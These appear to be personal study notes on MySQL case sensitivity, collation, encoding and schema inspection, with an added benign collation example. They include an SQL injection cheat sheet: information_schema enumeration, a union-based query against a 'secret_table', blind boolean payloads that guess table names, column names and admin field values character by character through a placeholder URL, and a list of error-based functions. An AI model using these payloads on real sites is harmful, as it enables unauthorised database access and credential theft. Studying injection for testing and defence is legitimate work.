Database and table names are case sensitive
Database and table names are case sensitive (on Linux)
Table aliases are strictly case sensitive
Column names and column aliases are case insensitive in all cases
Field contents are case insensitive by default [it depends on the collation]
Use MySQL's BINARY keyword to make a search case sensitive: select * from tb_user where BINARY username ='user';
char set and collation
Character set and collation [related to the encoding, whether retrieved data keeps its case, etc.]
Quick approach to troubleshooting garbled client output
show variables like '%char%';
Setting the connection encoding for the MySQL command-line console/shell [the official banner calls the tool "Welcome to the MySQL monitor"]
mysql --default-character-set=utf8 -u root -p
Viewing database/table information
show table status from information_schema like 'TABLES'; [case sensitive]
show create database information_schema;
show create table test;
show full columns from table_name;
The result above includes the columns below:
[Field | Type | Collation | Null | Key | Default | Extra | Privileges | Comment]
Basic injection workflow
Get the database name and user
select database()
select user()
Get table names
select table_name from information_schema.tables where table_schema='table_name' #
select *** from *** where ****=** and 0 <= (select COUNT(*) from table_name ) #
select *** from *** where ****=** and exists ( select * from table_name ) #
Get column names
select column_name from information_schema.columns where table_name='table_name'
***** union (select table_name, column_name, 1 from information_schema.columns where table_name='secret_table');#
Go
When a column name is purely numeric, remember to wrap it in backticks [the key above Tab]
select `1` from table_name;
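As an added example, not part of the original notes, here is a constructed MySQL 8 session (the tb_user table and its rows are made up) that ties together the collation, BINARY, show full columns and numeric-column-name points above:

```sql
-- Added example (not from the original notes): constructed MySQL 8 schema
-- showing how collation, BINARY and backticks from the notes above behave.
CREATE TABLE tb_user (
  id       INT AUTO_INCREMENT PRIMARY KEY,
  username VARCHAR(64) NOT NULL,
  `1`      VARCHAR(16)            -- purely numeric column name: backticks are mandatory
) CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci;

INSERT INTO tb_user (username, `1`) VALUES ('Admin', 'x');

-- Under the table's case-insensitive (_ci) collation this finds the 'Admin' row,
-- so a lookup written for 'admin' silently accepts any casing.
SELECT id, username, `1` FROM tb_user WHERE username = 'admin';

-- BINARY (as in the note above) compares bytes, so 'admin' no longer matches 'Admin'.
SELECT id, username FROM tb_user WHERE BINARY username = 'admin';

-- Same effect without BINARY: compare under a binary collation of the same charset.
SELECT id, username FROM tb_user WHERE username COLLATE utf8mb4_bin = 'admin';

-- The Collation column in this output tells you which rule each comparison uses.
SHOW FULL COLUMNS FROM tb_user;

-- A UNIQUE key is checked under the column's collation: with utf8mb4_general_ci
-- 'admin' is a duplicate of 'Admin', so this INSERT fails with ER_DUP_ENTRY.
ALTER TABLE tb_user ADD UNIQUE KEY uk_username (username);
INSERT INTO tb_user (username, `1`) VALUES ('admin', 'y');
```

The practical consequence for account tables: decide explicitly whether usernames should be compared case-insensitively (keep the _ci collation and a UNIQUE key) or exactly (use a _bin collation on the column), rather than relying on the server default.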
Guessing table names: http://www.XX.com/index.asp?id=1 and exists (select * from <guessed table name>)
Guessing column names: http://www.XX.com/index.asp?id=1 and exists (select <guessed column name> from <known table name>)
Guessing a column's length: http://www.XX.com/index.asp?id=1 and (select top 1 len(<known column name>) from admin)><guessed length, e.g. 5>
//The TOP clause specifies the number of records to return.
//The LEN function returns the length of the value in a text field.
Guessing the actual value: http://www.XX.com/index.asp?id=1 and (select top 1 asc(mid(<column name>,<position>,1)) from admin)><guessed ASCII code, e.g. 97>
//mid(<column name>,<start position>,N) extracts N characters starting at that position
//asc() converts a character to its ASCII code
Haven't touched this in far too long; memory suddenly gone.
So: start jotting notes, start recalling.
Baidu + Google + Cnblogs + CSDN + ...
Functions
user()
database()
updatexml()
extractvalue()
*extract: to pull out
concat
Variables
@@version
Statements
exists
union
join